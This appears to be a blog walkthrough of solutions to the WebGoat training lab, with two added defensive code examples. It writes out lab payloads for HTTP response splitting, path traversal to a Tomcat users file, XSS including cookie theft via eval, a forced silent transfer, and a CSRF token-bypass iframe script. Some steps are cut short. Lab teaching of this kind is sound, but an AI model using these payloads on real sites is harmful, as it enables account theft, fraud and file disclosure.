Webgoat Topic solution (GENERAL~XSS)

Source: Internet
Author: User

general*************************************************************

1. HTTP Splitting
Step 1

Cn%0acontent-length:%200%0a%0ahttp/1.1%20200%20ok%0acontent-type:%20text/html%0acontent-length:30%0a

Step2
Add a Last-Modified header so the injected page is cached by the server; note the required date format.

cn%0acontent-length:%200%0a%0ahttp/1.1%20200%20ok%0alast-modified:%20thu,%2001%20jan%204099%2012:00:00%20gmt%20%20%20%0acontent-type:%20text/html%0acontent-length:30%0a
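The splitting payload above works only because the server copies a decoded query parameter into a response header without rejecting CR/LF. The following is an added defensive example (not code from the original post or from WebGoat): it percent-decodes a parameter the way a server would and refuses any value containing a line break before it can reach a header. The function names and the copied payload constant are my own.

```javascript
// Added example: reject CR/LF in any value destined for a response header.
// Function and constant names are assumptions, not WebGoat's own code.

const CRLF_PATTERN = /[\r\n]/;

// True when the (already decoded) value contains no CR or LF character.
function isSafeHeaderValue(value) {
  return !CRLF_PATTERN.test(value);
}

// Decodes a raw query-string value like a server would ('+' becomes space,
// then percent-decoding) and validates it at the point of use, so encoding
// tricks in the raw form do not matter. Throws instead of emitting the header.
function headerValueFromQuery(rawValue) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawValue.replace(/\+/g, ' '));
  } catch (e) {
    throw new Error('malformed percent-encoding in parameter');
  }
  if (!isSafeHeaderValue(decoded)) {
    throw new Error('header value rejected: contains CR/LF');
  }
  return decoded;
}

// Constructed copy of the walkthrough's step 2 payload, used as test input.
const SPLITTING_PAYLOAD =
  'cn%0acontent-length:%200%0a%0ahttp/1.1%20200%20ok%0a' +
  'last-modified:%20thu,%2001%20jan%204099%2012:00:00%20gmt%20%20%20%0a' +
  'content-type:%20text/html%0acontent-length:30%0a';

// Convenience wrapper that reports the outcome as a string.
function classify(rawValue) {
  try {
    headerValueFromQuery(rawValue);
    return 'accepted';
  } catch (e) {
    return 'rejected';
  }
}

console.log('en ->', classify('en'));                        // accepted
console.log('payload ->', classify(SPLITTING_PAYLOAD));      // rejected
```

The check deliberately runs on the decoded value rather than on the raw parameter: the header is built from the decoded string, so that is the only form that needs to be clean.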


Access Control flaws**************************************************

1. Bypass a Path Based Access Control Scheme

../../../../../../../etc/tomcat6/tomcat-users.xml

The number of ../ segments depends on how deep the current directory is; use enough of them to reach the root directory.

AJAX security*********************************************************
1. Lab: DOM-Based Cross-Site Scripting
Step 1

</img>

Submit
Step2

</img> onMouseOver ...

<a onclick="javascript:alert(/xss/)">haha</a>

Onmouseover/onmouseout ...

<a onclick="javascript:eval(document.location.href='http://www.baidu.com')">haha</a>

Step3

<iframe src="javascript:alert(/xss/)"></iframe>

Step4

Please enter your password:<br><input type="password" id="passwd"><br><button onclick="javascript:alert('I have your password: ' + pass.value);">Submit</button>

This passes the lesson, but pass.value throws an error (the input's id is passwd).
Step 5
Edit /owaspbwa/webgoat-svn/target/webgoat-5.4+svn/javascript/DOMXSS.js and wrap name in the escapeHTML function:

function displayGreeting(name) {
    if (name != '') {
        // escape the user-controlled value before it is written as HTML
        document.getElementById("greeting").innerHTML = "Hello, " + escapeHTML(name) + "!";
    }
}

After encoding, it becomes
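To show what the escaping actually does to the step 3 payload, here is an added example (my own code, not the escapeHTML shipped in WebGoat's DOMXSS.js) that implements a minimal HTML escaper and builds the greeting as a string so it can be checked outside a browser.

```javascript
// Added example: minimal HTML escaping for text written via innerHTML.
// escapeHTML, greetingMarkup and displayGreeting here are my own versions.

// Escapes the five characters that change meaning in HTML text/attributes.
function escapeHTML(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Builds the greeting markup the same way the patched displayGreeting does,
// returned as a string so it can be tested without a DOM.
function greetingMarkup(name) {
  if (name !== '') {
    return 'Hello, ' + escapeHTML(name) + '!';
  }
  return '';
}

// Browser-side version: same logic, writes into the #greeting element.
function displayGreeting(name) {
  if (typeof document === 'undefined') return;  // no DOM when run under Node
  document.getElementById('greeting').innerHTML = greetingMarkup(name);
}

console.log(greetingMarkup('<iframe src="javascript:alert(/xss/)"></iframe>'));
// Hello, &lt;iframe src=&quot;javascript:alert(/xss/)&quot;&gt;&lt;/iframe&gt;!
```

After escaping, the browser renders the payload as literal text; no iframe element is created, which is why step 3 stops working once the fix is in place.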

2. Lab: Client Side Filtering
Step 1
By capturing the Ajax responses with WebScarab you can find the data for all 12 employees.
3. XML Injection
4. JSON Injection
Use WebScarab to intercept the XML and JSON data and modify it directly.
5. Silent Transactions Attacks
Analysing the script shows that the Ajax call uses the submitData(accountNo, balance) function to perform the transfer, so you can call this function directly. Enter in the browser address bar:

javascript:submitData(666,10000)

6. Dangerous Use of Eval

123"'); alert(document.cookie);//

The string passed to eval then becomes:

alert('Whoops: you entered an incorrect access code of "123"'); alert(document.cookie);//"');
7. Insecure Client Storage
Step 1
Debug clientSideValidation.js with Firebug: set a breakpoint at line 42 (return caesar ...) and keep resuming to discover all the coupon codes:
Platinum Gold Pressone Presstwo
Enter any one of them to pass.
Step 2
Use WebScarab to intercept the Ajax response and change the returned value to 0 to complete the lesson.

Authentication flaws*************************************************************
1. Basic Authentication
Step 1
View the request header to see it.
Step 2
1. Use WebScarab to remove the Authorization header and the cookie (both must be deleted).
2. Log in with basic:basic in the login box that appears.
3. Delete the cookie value at this point, which gives you a brand-new WebGoat session.
4. Select this lesson to pass.
2. Multi Level Login 2
Log in as joe/banana and enter the requested TAN to query your information. When the request is sent, change the value of hidden_user to jane using WebScarab.
3. Multi Level Login 1
Same as above, but modify the value of hidden_tan.

Buffer overflows********************************************************************

1. Off-by-One Overflows
Use Burp Suite to inject.

Code quality*************************************************************************

1. Discover Clues in the HTML
View the HTML source and search for <!-- to find:
<!--fixme ADMIN:ADMINPW--><!--use admin to regenerate database-->

Cross-site Scripting (XSS) ***********************************************************

1. Phishing with XSS
Construct a form:

 </form><br><br><br>

     Through the proxy you can see that a request to http://xx.xx.xx.xx/webgoat/Catcher?Property=yes&user=xx&password=xx&submit=login is actually sent to the server, but the requested page does not exist.
2. Lab: Cross Site Scripting
    Step 1
         Edit Tom's profile and change the street field to <script>alert(/xss/)</script>, then log in as Jerry and view Tom's profile to complete the lesson. Other fields can be modified as well.
    Step 3
3. Stored XSS Attacks
     Entering <script>alert(/xss/)</script> in the message box is enough.
4. Reflected XSS Attacks
     UpdateCart submits all purchase data via POST, but the values of "Enter your credit card number:" and "Enter your three digit access code:" are echoed back exactly as posted, so JS can be placed
     there: <script>alert(/xss/)</script>
5. Cross Site Request Forgery (CSRF)
     Same as Stored XSS.

6, CSRF Prompt By-Pass

7. CSRF Token By-Pass
    a. Open the Funds Transfer page by adding the parameter transferFunds=main to the URL.
    b. View the page source and find: <input type="hidden" value="-953910496" name="CSRFToken">
    c. Construct the payload. The key is to first open the transfer page with transferFunds=main to obtain the page's CSRFToken.

<script>
var tokenvalue;
function readFrame1() {
    // the first frame is same-origin, so its DOM (and the token) is readable
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("form")[1];
    var token = form.CSRFToken.value;
    tokenvalue = '&CSRFToken=' + token;
    loadFrame2();
}
function loadFrame2() {
    var testFrame = document.getElementById("frame2");
    testFrame.src = "http://xx.xx.xx.xx/WebGoat/attack?Screen=838&menu=900&transferFunds=4000" + tokenvalue;
}
</script>
<iframe src="http://xx.xx.xx.xx/WebGoat/attack?Screen=838&menu=900&transferFunds=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="1" scrolling="yes" height="1"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="1" scrolling="yes" height="1"></iframe>


This article is from the "Technology No Peak" blog, please be sure to keep this source http://shelia.blog.51cto.com/2930476/1626479
